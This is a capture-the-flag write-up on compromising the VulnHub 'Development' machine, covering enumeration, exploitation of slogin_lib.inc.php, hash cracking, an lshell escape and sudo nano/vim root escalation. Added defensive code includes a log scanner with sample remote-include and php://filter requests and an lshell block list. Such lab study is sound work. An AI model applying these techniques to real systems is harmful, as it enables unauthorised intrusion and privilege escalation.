CTF-Writeups/VulnHub/Development.md
2021-05-15 17:25:52 +05:00


Vulnhub-Development

NMAP


nmap -sC -sV 192.168.1.6
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-15 11:28 PKT
Nmap scan report for 192.168.1.6
Host is up (0.041s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 79:07:2b:2c:2c:4e:14:0a:e7:b3:63:46:c6:b3:ad:16 (RSA)
|_  256 24:6b:85:e3:ab:90:5c:ec:d5:83:49:54:cd:98:31:95 (ED25519)
113/tcp  open  ident?
|_auth-owners: oident
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_auth-owners: root
445/tcp  open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
|_auth-owners: root
8080/tcp open  http-proxy  IIS 6.0


PORT 139/445 (SMB)

We can see a share named access; let's see if we can access it as an anonymous user

Access is denied, so I ran enum4linux-ng and it found some users on the machine

PORT 8080

On this port we see an HTML page giving us a hint to look at html_pages

Here we can see a number of pages, so let's go through each of them one by one

About.html

This page tells us that they are creating a profile for David

Config.html

This page has nothing

Default.html

This page has something in binary, so let's convert it and see what it is. I have a feeling it's a rabbit hole : \

Huh ?
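As an added example (not part of the original writeup), here is a small Python decoder for the kind of encoded text a page like Default.html carries. It goes a step beyond plain binary-to-text: it peels nested layers of binary, hex and base64 until printable text comes out, and refuses a layer whose output is not clean ASCII, which is how you tell a real decode from a coincidental one. The sample input is constructed here and is not the VM's real page content.

```python
import base64
import re
import string

PRINTABLE = set(string.printable)


def decode_binary(s):
    """Decode whitespace-separated or continuous 8-bit groups; None if not binary."""
    bits = re.sub(r"\s+", "", s)
    if not bits or set(bits) - {"0", "1"} or len(bits) % 8:
        return None
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))


def decode_hex(s):
    """Decode a hex string (spaces allowed); None if not hex."""
    h = re.sub(r"\s+", "", s)
    if not h or len(h) % 2 or not re.fullmatch(r"[0-9a-fA-F]+", h):
        return None
    return bytes.fromhex(h)


def decode_base64(s):
    """Decode standard base64 with strict validation; None if not base64."""
    t = re.sub(r"\s+", "", s)
    if not t or len(t) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", t):
        return None
    try:
        return base64.b64decode(t, validate=True)
    except ValueError:
        return None


def looks_like_text(data):
    """True only if every byte is printable ASCII, so garbage is never accepted as a layer."""
    try:
        return all(c in PRINTABLE for c in data.decode("ascii"))
    except UnicodeDecodeError:
        return False


# Order matters: a binary string is also valid hex, so the stricter decoder goes first.
DECODERS = (("binary", decode_binary), ("hex", decode_hex), ("base64", decode_base64))


def peel(s, max_layers=8):
    """Strip encoding layers one at a time; returns (layer names, final text)."""
    layers, current = [], s
    for _ in range(max_layers):
        for name, fn in DECODERS:
            out = fn(current)
            if out is not None and looks_like_text(out):
                layers.append(name)
                current = out.decode("ascii")
                break
        else:
            break  # no decoder produced printable text: we have reached the plain layer
    return layers, current


def encode_layers(text, order):
    """Helper used to build the constructed sample: apply encodings innermost-first."""
    data = text.encode("ascii")
    for name in order:
        if name == "hex":
            data = data.hex().encode("ascii")
        elif name == "base64":
            data = base64.b64encode(data)
        elif name == "binary":
            data = " ".join(f"{b:08b}" for b in data).encode("ascii")
    return data.decode("ascii")


# Constructed sample (not the VM's real content): hex-encoded text, then binary-encoded.
SAMPLE = encode_layers("flag{rabbit_hole}", ["hex", "binary"])

if __name__ == "__main__":
    print(peel(SAMPLE))  # (['binary', 'hex'], 'flag{rabbit_hole}')
```

Because every layer must decode to printable ASCII, a page whose "binary" turns into byte soup stops after zero layers, which is the quickest signal that it really is a rabbit hole rather than a chain of encodings.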

Development.html

This page is interesting: it says there's a page hackersecretpage which contains a link to upload files, so let's see where that is

And again this has nothing, but looking at the development.html source code there's a comment

DevelopmentSecretPage

On clicking the link we get a page where it says to log out

Here I tried logging in with random credentials

I got this error, and it mentioned a file called slogin_lib.inc.php. I searched for the file name on Google and it straight away showed that there's an exploit for it

Let's try the RFI exploit

I hosted a file on my machine to see whether we can view it from there or not

It doesn't look like it worked, so let's try the sensitive information disclosure
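From the defender's side, an RFI attempt like the one above is easy to spot in the web server's access log, because the include parameter carries a full URL to another host. As an added example (not code from the writeup or from the Slogin software), here is a Python scanner that parses combined-format access log lines and flags query parameters whose value is a remote URL or a PHP stream wrapper. The log lines and the `page` parameter name are constructed for the example and are not taken from the target.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx "combined"-style access log line (regex written for this example)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
REMOTE_SCHEME = re.compile(r"^(?:https?|ftp)://", re.I)
# PHP stream wrappers that turn an include into code execution or file disclosure
STREAM_WRAPPER = re.compile(r"^(?:php://|data:|expect://|file://|phar://)", re.I)


def suspicious_params(target, own_hosts):
    """Return (param, reason, value) for query values that point at remote or wrapper URLs."""
    findings = []
    # parse_qsl already percent-decodes the values
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if REMOTE_SCHEME.match(value):
            host = (urlsplit(value).hostname or "").lower()
            if host not in own_hosts:  # links back to our own site (redirect params) are normal
                findings.append((key, "remote URL in parameter", value))
        elif STREAM_WRAPPER.match(value):
            findings.append((key, "PHP stream wrapper in parameter", value))
    return findings


def scan_log(lines, own_hosts=frozenset({"192.168.1.6", "localhost"})):
    """Scan log lines and return one alert dict per suspicious parameter."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        for param, reason, value in suspicious_params(m["target"], own_hosts):
            alerts.append({
                "ip": m["ip"],
                "path": urlsplit(m["target"]).path,
                "param": param,
                "reason": reason,
                "value": value,
                "status": int(m["status"]),
            })
    return alerts


# Constructed sample log lines, not captured from the machine
SAMPLE_LOG = [
    '192.168.1.9 - - [15/May/2021:11:40:01 +0500] "GET /html_pages/index.php?page=about HTTP/1.1" 200 512',
    '192.168.1.9 - - [15/May/2021:11:41:15 +0500] "GET /html_pages/index.php?page=http%3A%2F%2F192.168.1.9%2Fpayload.txt HTTP/1.1" 200 88',
    '192.168.1.9 - - [15/May/2021:11:42:03 +0500] "GET /html_pages/index.php?page=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dindex HTTP/1.1" 200 3012',
    '192.168.1.9 - - [15/May/2021:11:43:20 +0500] "GET /html_pages/index.php?next=http%3A%2F%2F192.168.1.6%2Flogin HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

A 200 status on a flagged request is worth a closer look than a 404 or 500: it means the application accepted the parameter, even if (as in this writeup) the include did not actually work.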

We got some hashes; let's try to crack them with CrackStation

Let's try to ssh into the machine

We are in, but something looks odd: it says to type ? for help

If we type commands other than these, it will show an error

So it looks like we are in a restricted shell, but I came across an error when I typed id

It seems lshell.py is being used, so let's do a quick Google search on that

This is a Python script which restricts which commands can be executed in the shell; we can forbid or allow any commands we want
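To show what that allow/forbid control looks like in practice, here is an added example of an lshell configuration; it is not the machine's actual config, and the command lists are illustrative choices. lshell reads its settings from /etc/lshell.conf, and the [default] section applies to every user that is not given a more specific section.

```ini
# Added example lshell.conf (not the target's configuration)
[default]
# Only these commands are accepted; anything else is refused with an error
allowed : ['ls','cat','pwd','echo']

# Strings refused anywhere in a command line, closing off chaining and redirection
forbidden : [';', '&', '|', '`', '>', '<', '$(', '${']

# Number of refused attempts before the session is terminated
warning_counter : 2

# Log everything (0 = nothing, 4 = everything) so refused commands are visible
loglevel : 4
```

The allow-list only governs what lshell itself parses; as the rest of this writeup shows, a permitted command that can itself run other programs undoes the restriction, so the allowed list has to be kept to commands that cannot execute anything else.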

So that's what was happening; let's search for any bypasses related to lshell

https://www.aldeid.com/wiki/Lshell

Bingo, we can bypass this easily; let's give this a try

Reading work.txt

1.Tell Patrick that shoutbox is not working. We need to revert to the old method to update David about shoutbox. For new, we will use the old director's landing page.

2.Patrick's start of the third year in this company!

3.Attend the meeting to discuss if password policy should be relooked at.

This isn't really helpful, so going back to patrick's hash I tried to crack it one more time on an online site

So we have switched to patrick and can see that we can escalate to root using either vim or nano; let's visit GTFOBins to escalate our shell

Using Vim

Using Nano

Launch nano with sudo (sudo /bin/nano), then press Alt+R

Then Alt+X

You'll get a prompt to execute commands

You got root !!!
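The root cause here is a sudo rule that grants an interactive editor, which is the kind of thing a periodic audit should catch before an attacker does. As an added, defender-side example (not the writeup's code), here is a Python audit that parses `sudo -l` output and flags rules granting editors or pagers able to run other programs, as well as unrestricted `ALL` rules. The `sudo -l` text below is constructed for the example and was not captured from the machine, and the set of shell-capable binaries is a short illustrative list rather than an exhaustive one.

```python
import os
import re
import shlex

# Editors/pagers whose interactive mode can launch other programs (illustrative, not exhaustive)
SHELL_CAPABLE = {"vim", "vi", "vimdiff", "nano", "less", "more", "man", "ed"}

# Constructed sample of `sudo -l` output, not taken from the target
SUDO_L_SAMPLE = """\
Matching Defaults entries for patrick on development:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User patrick may run the following commands on development:
    (ALL) NOPASSWD: /usr/bin/vim
    (ALL) NOPASSWD: /bin/nano
    (root) /usr/bin/apt-get update
"""

# One rule line: "(runas) [TAG: ...] command[, command...]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return a list of {runas, tags, command} dicts from `sudo -l` output."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True  # rule lines follow this header
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.strip() for t in m["tags"].split(":") if t.strip()]
        for cmd in m["cmds"].split(","):
            rules.append({"runas": m["runas"].strip(), "tags": tags, "command": cmd.strip()})
    return rules


def audit(rules):
    """Flag rules that hand out a root shell one way or another."""
    findings = []
    for r in rules:
        if r["command"] == "ALL":
            findings.append({**r, "reason": "unrestricted sudo (ALL)"})
            continue
        binary = os.path.basename(shlex.split(r["command"])[0])
        if binary in SHELL_CAPABLE:
            detail = "editor/pager can spawn a shell"
            if "NOPASSWD" in r["tags"]:
                detail += ", without a password"
            findings.append({**r, "reason": detail})
    return findings


if __name__ == "__main__":
    for f in audit(parse_sudo_l(SUDO_L_SAMPLE)):
        print(f"{f['command']:<24} ({f['runas']}) {f['reason']}")
```

Run it against real `sudo -l` output with `python3 audit.py < <(sudo -l)` after swapping the sample for `sys.stdin.read()`; the rules to fix are the ones it prints, and the fix is to grant a narrowly scoped command rather than the editor itself.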

Unintended way to root

Recently an Ubuntu OverlayFS local privilege escalation vulnerability was found

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3493

So I used that exploit's PoC to get root

https://github.com/briskets/CVE-2021-3493/blob/main/exploit.c